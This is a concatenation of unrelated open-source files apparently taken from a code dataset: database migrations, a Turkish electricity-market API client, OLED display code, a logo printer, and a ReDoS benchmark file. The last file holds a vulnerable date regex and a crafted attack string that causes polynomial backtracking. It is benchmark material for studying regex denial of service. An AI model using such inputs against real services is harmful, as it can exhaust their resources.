        ("PlatformTypes", [("platform_type_id", None)]),
        ("Participants", [("task_id", False), ("privacy_id", False),
                          ("platform_id", False), ("participant_id", None)]),
        ("Nationalities", [("nationality_id", None)]),
        ("MediaTypes", [("media_type_id", None)]),
        ("Media", [("subject_id", True), ("source_id", False), ("sensor_id", True),
                   ("privacy_id", True), ("platform_id", True),
                   ("media_type_id", False), ("media_id", None)]),
        ("LogsHoldings", [("unit_type_id", False), ("source_id", False),
                          ("privacy_id", True), ("platform_id", False),
                          ("logs_holding_id", None), ("commodity_id", False)]),
        ("Logs", [("log_id", None), ("id", False), ("change_id", False)]),
        ("HostedBy", [("subject_id", False), ("hosted_by_id", None), ("host_id", False)]),
        ("GeometryTypes", [("geo_type_id", None)]),
        ("GeometrySubTypes", [("geo_sub_type_id", None)]),
        ("Geometries", [("task_id", True), ("subject_platform_id", True),
                        ("source_id", False), ("sensor_platform_id", True),
                        ("privacy_id", True), ("geometry_id", None),
                        ("geo_type_id", False), ("geo_sub_type_id", False)]),
        ("Extractions", [("extraction_id", None)]),
        ("Datafiles", [("privacy_id", False), ("datafile_type_id", False),
                       ("datafile_id", None)]),
        ("DatafileTypes", [("datafile_type_id", None)]),
        ("Contacts", [("subject_id", True), ("source_id", False),
                      ("sensor_id", False), ("privacy_id", True), ("contact_id", None)]),
        ("ContactTypes", [("contact_type_id", None)]),
        ("ConfidenceLevels", [("confidence_level_id", None)]),
        ("CommodityTypes", [("commodity_type_id", None)]),
        ("Comments", [("source_id", False), ("privacy_id", True),
                      ("platform_id", True), ("comment_type_id", False),
                      ("comment_id", None)]),
        ("CommentTypes", [("comment_type_id", None)]),
        ("ClassificationTypes", [("class_type_id", None)]),
        ("Changes", [("change_id", None)]),
        ("Activations", [("source_id", False), ("sensor_id", False),
                         ("privacy_id", True), ("activation_id", None)]),
    ]
    for table, columns in uuid_to_int:
        with op.batch_alter_table(table, schema=None) as batch_op:
            for column, existing_nullable in columns:
                kwargs = {}
                if existing_nullable is not None:
                    kwargs["existing_nullable"] = existing_nullable
                batch_op.alter_column(
                    column,
                    existing_type=pepys_import.utils.sqlalchemy_utils.UUIDType(length=16),
                    type_=sa.INTEGER(),
                    **kwargs,
                )
    # ### end Alembic commands ###
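# The migration above swaps INTEGER primary keys for 16-byte UUIDType columns
# and back. As a side note on that type change, here is a minimal sketch
# (hypothetical helpers, not part of pepys_import or this migration) of a
# deterministic integer-to-UUID round trip using only the standard library:

```python
import uuid


def int_to_uuid(n: int) -> uuid.UUID:
    """Embed an integer key in the low bits of a 128-bit UUID."""
    return uuid.UUID(int=n)


def uuid_to_int(u: uuid.UUID) -> int:
    """Recover the original integer key from such a UUID."""
    return u.int


key = int_to_uuid(42)
print(key)             # 00000000-0000-0000-0000-00000000002a
print(uuid_to_int(key))  # 42
```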
# --- seffaflik/elektrik/piyasalar/ia.py (repo: tgbaozkn/seffaflik, MIT) ---
import pandas as __pd
import datetime as __dt
from multiprocessing import Pool as __Pool
import multiprocessing as __mp
from functools import reduce as __red
import logging as __logging

from seffaflik.__ortak.__araclar import make_requests as __make_requests
from seffaflik.__ortak import __araclar as __araclar, __dogrulama as __dogrulama
from seffaflik.elektrik.uretim import organizasyonlar as __organizasyonlar

__first_part_url = "market/"


def hacim(baslangic_tarihi=__dt.datetime.today().strftime("%Y-%m-%d"),
          bitis_tarihi=__dt.datetime.today().strftime("%Y-%m-%d"), organizasyon_eic=""):
    """
    Returns the bilateral agreement (İA) supply/demand volumes for the given
    date range.

    Note: if "organizasyon_eic" is given, the hourly supply/demand volumes of
    that organization are returned.

    Parameters
    ----------
    baslangic_tarihi : start date in YYYY-MM-DD format (default: today)
    bitis_tarihi     : end date in YYYY-MM-DD format (default: today)
    organizasyon_eic : organization EIC code as a string (default: "")

    Returns
    -------
    Supply/demand bilateral agreement quantities (MWh)
    """
    if __dogrulama.__baslangic_bitis_tarih_eic_dogrulama(baslangic_tarihi, bitis_tarihi, organizasyon_eic):
        try:
            particular_url = \
                __first_part_url + "bilateral-contract-sell" + "?startDate=" + baslangic_tarihi + "&endDate=" + \
                bitis_tarihi + "&eic=" + organizasyon_eic
            json = __make_requests(particular_url)
            df_arz = __pd.DataFrame(json["body"]["bilateralContractSellList"])
            particular_url = \
                __first_part_url + "bilateral-contract-buy" + "?startDate=" + baslangic_tarihi + "&endDate=" + \
                bitis_tarihi + "&eic=" + organizasyon_eic
            json = __make_requests(particular_url)
            df_talep = __pd.DataFrame(json["body"]["bilateralContractBuyList"])
            df = __araclar.__merge_ia_dfs_evenif_empty(df_arz, df_talep)
            df["Saat"] = df["date"].apply(lambda h: int(h[11:13]))
            df["Tarih"] = __pd.to_datetime(df["date"].apply(lambda d: d[:10]))
            df = df[["Tarih", "Saat", "Talep Miktarı", "Arz Miktarı"]]
        except (KeyError, TypeError):
            return __pd.DataFrame()
        else:
            return df


def tum_organizasyonlar_hacim(baslangic_tarihi=__dt.datetime.today().strftime("%Y-%m-%d"),
                              bitis_tarihi=__dt.datetime.today().strftime("%Y-%m-%d"), hacim_tipi="NET"):
    """
    Returns the hourly bilateral agreement volumes of all organizations for
    the given date range and volume type.

    Parameters
    ----------
    baslangic_tarihi : start date in YYYY-MM-DD format (default: today)
    bitis_tarihi     : end date in YYYY-MM-DD format (default: today)
    hacim_tipi       : volume type as a string ("NET", "ARZ" or "TALEP") (default: "NET")

    Returns
    -------
    Bilateral agreement (İA) volumes of all organizations (Tarih, Saat, Hacim)
    """
    if __dogrulama.__baslangic_bitis_tarih_dogrulama(baslangic_tarihi, bitis_tarihi):
        list_org = __organizasyonlar()[["EIC Kodu", "Kısa Adı"]].to_dict("records")
        org_len = len(list_org)
        list_date_org_eic = list(zip([baslangic_tarihi] * org_len, [bitis_tarihi] * org_len, list_org))
        list_date_org_eic = list(map(list, list_date_org_eic))
        with __Pool(__mp.cpu_count()) as p:
            if hacim_tipi.lower() == "net":
                list_df_unit = p.starmap(__organizasyonel_net_hacim, list_date_org_eic, chunksize=1)
            elif hacim_tipi.lower() == "arz":
                list_df_unit = p.starmap(__organizasyonel_arz_hacim, list_date_org_eic, chunksize=1)
            elif hacim_tipi.lower() == "talep":
                list_df_unit = p.starmap(__organizasyonel_talep_hacim, list_date_org_eic, chunksize=1)
            else:
                __logging.error("Lütfen geçerli bir hacim tipi giriniz: Net, Arz, Talep", exc_info=False)
                # Without this early return the reduce below would raise a
                # NameError, since list_df_unit was never assigned.
                return __pd.DataFrame()
        list_df_unit = list(filter(lambda x: len(x) > 0, list_df_unit))
        df_unit = __red(lambda left, right: __pd.merge(left, right, how="outer", on=["Tarih", "Saat"], sort=True),
                        list_df_unit)
        return df_unit


def tum_gorevli_tedarik_hacim(baslangic_tarihi=__dt.datetime.today().strftime("%Y-%m-%d"),
                              bitis_tarihi=__dt.datetime.today().strftime("%Y-%m-%d"), hacim_tipi="NET"):
    """
    Returns the hourly bilateral agreement volumes of all appointed supply
    companies (organizations whose name contains K1, K2 or K3) for the given
    date range and volume type.

    Parameters
    ----------
    baslangic_tarihi : start date in YYYY-MM-DD format (default: today)
    bitis_tarihi     : end date in YYYY-MM-DD format (default: today)
    hacim_tipi       : volume type as a string ("NET", "ARZ" or "TALEP") (default: "NET")

    Returns
    -------
    Bilateral agreement (İA) volumes of the appointed supply companies (Tarih, Saat, Hacim)
    """
    if __dogrulama.__baslangic_bitis_tarih_dogrulama(baslangic_tarihi, bitis_tarihi):
        org = __organizasyonlar()
        org = org[(org["Adı"].str.contains("K1")) | (org["Adı"].str.contains("K2")) | (
            org["Adı"].str.contains("K3"))].reset_index(drop=True)
        list_org = org[["EIC Kodu", "Kısa Adı"]].to_dict("records")
        org_len = len(list_org)
        list_date_org_eic = list(zip([baslangic_tarihi] * org_len, [bitis_tarihi] * org_len, list_org))
        list_date_org_eic = list(map(list, list_date_org_eic))
        with __Pool(__mp.cpu_count()) as p:
            if hacim_tipi.lower() == "net":
                list_df_unit = p.starmap(__organizasyonel_net_hacim, list_date_org_eic, chunksize=1)
            elif hacim_tipi.lower() == "arz":
                list_df_unit = p.starmap(__organizasyonel_arz_hacim, list_date_org_eic, chunksize=1)
            elif hacim_tipi.lower() == "talep":
                list_df_unit = p.starmap(__organizasyonel_talep_hacim, list_date_org_eic, chunksize=1)
            else:
                __logging.error("Lütfen geçerli bir hacim tipi giriniz: Net, Arz, Talep", exc_info=False)
                # Early return for the same NameError reason as above.
                return __pd.DataFrame()
        list_df_unit = list(filter(lambda x: len(x) > 0, list_df_unit))
        df_unit = __red(lambda left, right: __pd.merge(left, right, how="outer", on=["Tarih", "Saat"], sort=True),
                        list_df_unit)
        return df_unit


def __organizasyonel_net_hacim(baslangic_tarihi, bitis_tarihi, org):
    """
    Returns the hourly net bilateral agreement volumes of the given
    organization for the given date range.

    Important
    ---------
    If no organization is given, the total market volume is returned.

    Parameters
    ----------
    baslangic_tarihi : start date in YYYY-MM-DD format
    bitis_tarihi     : end date in YYYY-MM-DD format
    org              : dict holding the organization's "EIC Kodu" and "Kısa Adı"

    Returns
    -------
    Net İA quantity (MWh)
    """
    try:
        particular_url = \
            __first_part_url + "bilateral-contract-sell" + "?startDate=" + baslangic_tarihi + "&endDate=" + \
            bitis_tarihi + "&eic=" + org["EIC Kodu"]
        json = __make_requests(particular_url)
        df_arz = __pd.DataFrame(json["body"]["bilateralContractSellList"])
        particular_url = \
            __first_part_url + "bilateral-contract-buy" + "?startDate=" + baslangic_tarihi + "&endDate=" + \
            bitis_tarihi + "&eic=" + org["EIC Kodu"]
        json = __make_requests(particular_url)
        df_talep = __pd.DataFrame(json["body"]["bilateralContractBuyList"])
        df = __araclar.__merge_ia_dfs_evenif_empty(df_arz, df_talep)
        df["Saat"] = df["date"].apply(lambda h: int(h[11:13]))
        df["Tarih"] = __pd.to_datetime(df["date"].apply(lambda d: d[:10]))
        df[org["Kısa Adı"]] = df["Talep Miktarı"] - df["Arz Miktarı"]
        df = df[["Tarih", "Saat", org["Kısa Adı"]]]
    except (KeyError, TypeError):
        return __pd.DataFrame()
    else:
        return df


def __organizasyonel_arz_hacim(baslangic_tarihi, bitis_tarihi, org):
    """
    Returns the hourly bilateral agreement supply volumes of the given
    organization for the given date range.

    Important
    ---------
    If no organization is given, the total market volume is returned.

    Parameters
    ----------
    baslangic_tarihi : start date in YYYY-MM-DD format
    bitis_tarihi     : end date in YYYY-MM-DD format
    org              : dict holding the organization's "EIC Kodu" and "Kısa Adı"

    Returns
    -------
    Supply İA quantity (MWh)
    """
    try:
        particular_url = __first_part_url + "bilateral-contract-sell" + "?startDate=" + baslangic_tarihi + "&endDate=" \
                         + bitis_tarihi + "&eic=" + org["EIC Kodu"]
        json = __make_requests(particular_url)
        df = __pd.DataFrame(json["body"]["bilateralContractSellList"])
        df["Saat"] = df["date"].apply(lambda h: int(h[11:13]))
        df["Tarih"] = __pd.to_datetime(df["date"].apply(lambda d: d[:10]))
        df.rename(index=str, columns={"quantity": org["Kısa Adı"]}, inplace=True)
        df = df[["Tarih", "Saat", org["Kısa Adı"]]]
    except (KeyError, TypeError):
        return __pd.DataFrame()
    else:
        return df


def __organizasyonel_talep_hacim(baslangic_tarihi, bitis_tarihi, org):
    """
    Returns the hourly bilateral agreement (İA) demand volumes of the given
    organization for the given date range.

    Important
    ---------
    If no organization is given, the total market volume is returned.

    Parameters
    ----------
    baslangic_tarihi : start date in YYYY-MM-DD format
    bitis_tarihi     : end date in YYYY-MM-DD format
    org              : dict holding the organization's "EIC Kodu" and "Kısa Adı"

    Returns
    -------
    Demand İA quantity (MWh)
    """
    try:
        particular_url = __first_part_url + "bilateral-contract-buy" + "?startDate=" + baslangic_tarihi + "&endDate=" \
                         + bitis_tarihi + "&eic=" + org["EIC Kodu"]
        json = __make_requests(particular_url)
        df = __pd.DataFrame(json["body"]["bilateralContractBuyList"])
        df["Saat"] = df["date"].apply(lambda h: int(h[11:13]))
        df["Tarih"] = __pd.to_datetime(df["date"].apply(lambda d: d[:10]))
        df.rename(index=str, columns={"quantity": org["Kısa Adı"]}, inplace=True)
        df = df[["Tarih", "Saat", org["Kısa Adı"]]]
    except (KeyError, TypeError):
        return __pd.DataFrame()
    else:
        return df
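# tum_organizasyonlar_hacim above zips one (start, end, org) triple per
# organization, fans the triples out to a process pool with starmap, and
# outer-merges the per-organization results with reduce. A minimal,
# self-contained sketch of that fan-out/merge pattern using only the standard
# library (hypothetical organization names, dicts standing in for DataFrames,
# no EPİAŞ requests):

```python
from functools import reduce
from multiprocessing.dummy import Pool  # thread-backed Pool with the same API


def fetch(start, end, org):
    # Stand-in for __organizasyonel_net_hacim: one "column" per organization.
    return {org: "%s..%s" % (start, end)}


orgs = ["ORG-A", "ORG-B", "ORG-C"]
triples = [("2020-01-01", "2020-01-02", org) for org in orgs]  # like list_date_org_eic
with Pool(3) as pool:
    results = pool.starmap(fetch, triples, chunksize=1)

# reduce-merge, analogous to __red(lambda l, r: __pd.merge(l, r, ...), list_df_unit)
merged = reduce(lambda left, right: {**left, **right}, results)
print(merged)
```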
# --- dace/frontend/octave/__init__.py (repo: tbennun/dace, BSD-3-Clause) ---
from .ast_node import AST_Node, AST_Statements
# --- ups_modul/inout/write_oled.py (repo: theanhgen/ups, Apache-2.0) ---
import time
import Adafruit_GPIO.SPI as SPI
import Adafruit_SSD1306
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
import subprocess

# Raspberry Pi pin configuration:
RST = 24  # on the PiOLED this pin isn't used
# Note the following are only used with SPI:
DC = 23
SPI_PORT = 0
SPI_DEVICE = 0


def _show_lines(lines, sleep_seconds, clear_after=False):
    """Render up to four 8 px-high text rows on the 128x32 OLED.

    The original module repeated this drawing code verbatim in every write_*
    function; it is factored out here without changing behaviour.
    """
    disp = Adafruit_SSD1306.SSD1306_128_32(rst=RST, dc=DC)
    disp.begin()
    # Clear display.
    disp.clear()
    disp.display()
    # Create blank image for drawing; mode '1' gives 1-bit colour.
    width = disp.width
    height = disp.height
    image = Image.new('1', (width, height))
    # Get drawing object to draw on image.
    draw = ImageDraw.Draw(image)
    # Draw a black filled box to clear the image.
    draw.rectangle((0, 0, width, height), outline=0, fill=0)
    # Constants that allow easy resizing of shapes.
    padding = -2
    top = padding
    # Keep track of the current x position for drawing.
    x = 0
    # Load default font.
    font = ImageFont.load_default()
    # Write the lines of text, 8 px apart.
    for i, text in enumerate(lines):
        draw.text((x, top + 8 * i), text, font=font, fill=255)
    # Display image.
    disp.image(image)
    disp.display()
    time.sleep(sleep_seconds)
    if clear_after:
        disp.clear()


def write(text):
    _show_lines([text], 5, clear_after=True)


def write_2l(text, text2):
    _show_lines([text, text2], 2.5)


def write_3l(text, text2, text3):
    _show_lines([text, text2, text3], 3)


def write_4l(text, text2, text3, text4):
    _show_lines([text, text2, text3, text4], 2.5)


def write_top4(top4):
    _show_lines(top4, 0)
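# The write_* helpers above place successive text rows 8 px apart starting at
# top = padding = -2, so the 32 px panel has room for exactly four rows. A
# tiny, hardware-free sketch of that layout arithmetic (constants copied from
# the module; the helper name is hypothetical):

```python
HEIGHT = 32    # SSD1306_128_32 panel height in pixels
PADDING = -2   # same constant as in the write_* functions
LINE_PX = 8    # vertical step used by draw.text((x, top + 8 * i), ...)


def line_offsets(n):
    """y offsets for n text rows, as computed in the module."""
    return [PADDING + LINE_PX * i for i in range(n)]


print(line_offsets(4))  # [-2, 6, 14, 22] -- all four rows start inside the panel
```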
# --- bounties_api/std_bounties/migrations/0022_auto_20190401_1856.py
#     (repo: tenthirtyone/BountiesAPI, MIT) ---
# -*- coding: utf-8 -*-
# Generated by Django 1.11.18 on 2019-04-01 18:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):

    dependencies = [
        ('std_bounties', '0021_auto_20190401_1836'),
    ]

    operations = [
        migrations.AlterField(
            model_name='bounty',
            name='attached_data_hash',
            field=models.CharField(blank=True, max_length=256, null=True),
        ),
        migrations.AlterField(
            model_name='bounty',
            name='attached_filename',
            field=models.CharField(blank=True, max_length=256, null=True),
        ),
        migrations.AlterField(
            model_name='bounty',
            name='attached_url',
            field=models.CharField(blank=True, max_length=256, null=True),
        ),
        migrations.AlterField(
            model_name='draftbounty',
            name='attached_data_hash',
            field=models.CharField(blank=True, max_length=256, null=True),
        ),
        migrations.AlterField(
            model_name='draftbounty',
            name='attached_filename',
            field=models.CharField(blank=True, max_length=256, null=True),
        ),
        migrations.AlterField(
            model_name='draftbounty',
            name='attached_url',
            field=models.CharField(blank=True, max_length=256, null=True),
        ),
    ]
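The six `AlterField` operations in this migration are the cross product of two models (`bounty`, `draftbounty`) and three attachment fields, all switched to the same `CharField` definition. A hedged, Django-free sketch of that structure using `itertools.product` (plain dicts stand in for `migrations.AlterField`; this is illustration, not how the file was generated):

```python
from itertools import product

# The repeated AlterField pattern above, expressed as a cross product.
models_ = ["bounty", "draftbounty"]
fields = ["attached_data_hash", "attached_filename", "attached_url"]

operations = [
    {"op": "AlterField", "model_name": m, "name": f,
     "field": "CharField(blank=True, max_length=256, null=True)"}
    for m, f in product(models_, fields)
]
# → 6 operation descriptors, one per (model, field) pair.
```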
| 31.282609 | 74 | 0.594163 | 148 | 1,439 | 5.581081 | 0.337838 | 0.145278 | 0.181598 | 0.210654 | 0.761501 | 0.761501 | 0.761501 | 0.719128 | 0.719128 | 0.719128 | 0 | 0.050881 | 0.289785 | 1,439 | 45 | 75 | 31.977778 | 0.757339 | 0.04795 | 0 | 0.789474 | 1 | 0 | 0.131675 | 0.016825 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052632 | 0 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
3d112726d56b3bbf57dac8f790b9e396da1944fb | 1,851 | py | Python | util/logo.py | siekmanj/rrl_tmp | 247e1cbde3e5fdc2c1c72e31c52b3d08c9d68cf1 | [
"CC0-1.0"
] | 30 | 2020-05-01T16:11:33.000Z | 2022-02-21T08:23:58.000Z | util/logo.py | siekmanj/rrl_tmp | 247e1cbde3e5fdc2c1c72e31c52b3d08c9d68cf1 | [
"CC0-1.0"
] | 2 | 2020-11-29T23:01:02.000Z | 2021-05-26T20:57:23.000Z | util/logo.py | siekmanj/rrl_tmp | 247e1cbde3e5fdc2c1c72e31c52b3d08c9d68cf1 | [
"CC0-1.0"
] | 3 | 2020-09-01T03:16:25.000Z | 2021-04-02T19:33:54.000Z | class color:
    BOLD = '\033[1m\033[48m'
    END = '\033[0m'
    ORANGE = '\033[38;5;202m'
    BLACK = '\033[38;5;240m'
def print_logo(subtitle=""):
    print(color.BOLD, end="")
    print(color.ORANGE, end="")
    print(" @@@@@@@@@@@@@/ ")
    print(" * #@@@ ")
    print("#@@@@@@@@@@@@&%/. .@@@, *@@@@% ")
    print("#@@@@@@@@@@@@@@@@@@@@/ &@@( *@@@@% ")
    print("#@@@@/ /@@@@@@* %@@& *@@@@% ")
    print("#@@@@/ *@@@@@. ,@@@# *@@@@% ")
    print("#@@@@/ @@@@@/ %@@@, *@@@@% ")
    print("#@@@@/ .@@@@@, *@@@# *@@@@% ")
    print("#@@@@/ *@@@@@( @@@@@@@@@@@@@@@* *@@@@% ")
    print("#@@@@@&&&&&&@@@@@@@@@( *@@@@% ")
    print("#@@@@@@@@@@@@@@@@@@* *@@@@% ")
    print("#@@@@/ ,@@@@@& *@@@@% ")
    print("#@@@@/ .@@@@@/ *@@@@% ")
    print("#@@@@/ #@@@@% *@@@@% ")
    print("#@@@@/ *@@@@@ *@@@@% ")
    print("#@@@@/ .@@@@@, *@@@@&((((((((((((((((((")
    print("#@@@@/ &@@@@( *@@@@@@@@@@@@@@@@@@@@@@@")
    print(color.END)
    print(subtitle + "\n\n")
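The `color` class above is a small table of ANSI SGR escape sequences: `\033[1m` turns on bold, `\033[0m` resets, and `\033[38;5;Nm` selects foreground color N from the 256-color palette (202 is the orange used for the logo). A minimal sketch of that mechanism (`fg256` is an illustrative helper, not part of the original file):

```python
# "\033[38;5;Nm" = 256-color foreground select; "\033[0m" = reset attributes.
def fg256(n, text):
    """Wrap text in an ANSI escape that colors it with palette entry n."""
    return f"\033[38;5;{n}m{text}\033[0m"

orange_text = fg256(202, "logo")  # 202 matches color.ORANGE above
```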
| 63.827586 | 99 | 0.126418 | 56 | 1,851 | 4.160714 | 0.339286 | 0.729614 | 1.030043 | 1.287554 | 0.386266 | 0.386266 | 0.386266 | 0.386266 | 0.386266 | 0.386266 | 0 | 0.040312 | 0.584549 | 1,851 | 28 | 100 | 66.107143 | 0.262679 | 0 | 0 | 0 | 0 | 0 | 0.763911 | 0.049703 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0 | 0 | 0.222222 | 0.814815 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
3d31f93224c032969abe10ecf84dbdbd1e5b3e44 | 299 | py | Python | src/prism-fruit/Games-DQL/examples/games/car/networkx/algorithms/assortativity/__init__.py | kushgrover/apt-vs-dift | 250f64e6c442f6018cab65ec6979d9568a842f57 | [
"MIT"
] | null | null | null | src/prism-fruit/Games-DQL/examples/games/car/networkx/algorithms/assortativity/__init__.py | kushgrover/apt-vs-dift | 250f64e6c442f6018cab65ec6979d9568a842f57 | [
"MIT"
] | null | null | null | src/prism-fruit/Games-DQL/examples/games/car/networkx/algorithms/assortativity/__init__.py | kushgrover/apt-vs-dift | 250f64e6c442f6018cab65ec6979d9568a842f57 | [
"MIT"
] | null | null | null | from networkx.algorithms.assortativity.connectivity import *
from networkx.algorithms.assortativity.correlation import *
from networkx.algorithms.assortativity.mixing import *
from networkx.algorithms.assortativity.neighbor_degree import *
from networkx.algorithms.assortativity.pairs import *
| 49.833333 | 64 | 0.849498 | 31 | 299 | 8.16129 | 0.354839 | 0.237154 | 0.434783 | 0.6917 | 0.648221 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083612 | 299 | 5 | 65 | 59.8 | 0.923358 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
3d4c536a274d0ef52f88c3266454fdc2eb729bf4 | 4,884 | py | Python | regexlib/python_re_test_file/regexlib_2831.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | 1 | 2022-01-24T14:43:23.000Z | 2022-01-24T14:43:23.000Z | regexlib/python_re_test_file/regexlib_2831.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | null | null | null | regexlib/python_re_test_file/regexlib_2831.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | null | null | null | # 2831
# ^(?:(?:(?:(?:[1-2][0-9]{3}) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]))|(?:(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) *(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3}))))|(?:(?:(?:(?:[1-2][0-9]{3}) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]))|(?:(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) *(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) 
*(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))) *(?:(?:(?:1[0-2]|0?[1-9])(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))?(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))? *(?:(?i:[ap]m)))|(?:(?:2[0-3]|[01]?[0-9])(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))(?: *(?:\:) *(?:[1-5][0-9]|0?[0-9]))?))))$
# POLYNOMIAL
# nums:4
# POLYNOMIAL AttackString:"10"+" "*5000+"!1 __POA(i)"
import re
from time import perf_counter
regex = """^(?:(?:(?:(?:[1-2][0-9]{3}) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]))|(?:(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) *(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3})))|(?:(?:(?:[12][0-9]|3[01]|0?[1-9])|(?:(?i:[23]?1st|2?2nd|2?3rd|[4-9]th|1[0-9]th|20th|2[4-9]th|30th))) *(?:[\/\-\., ]) *(?:(?i:(?:j(?:an(?:uary)?|u(?:ne?|ly?)))|a(?:pr(?:il)?|ug(?:ust)?)|ma(?:y|r(?:ch)?)|(?:nov|dec)(?:ember)?|feb(?:ruary)?|sep(?:tember)?|oct(?:ober)?)) *(?:[\/\-\., ]) *(?:(?:[0-9]{1,2})|(?:[1-2][0-9]{3}))))|(?:(?:(?:(?:[1-2][0-9]{3}) *(?:[\/\-\., ]) *(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]))|(?:(?:1[0-2]|0?[1-9]) *(?:[\/\-\., ]) *(?:[12][0-9]|3[01]|0?[1-9]) *(?:[\/\-\., ]) 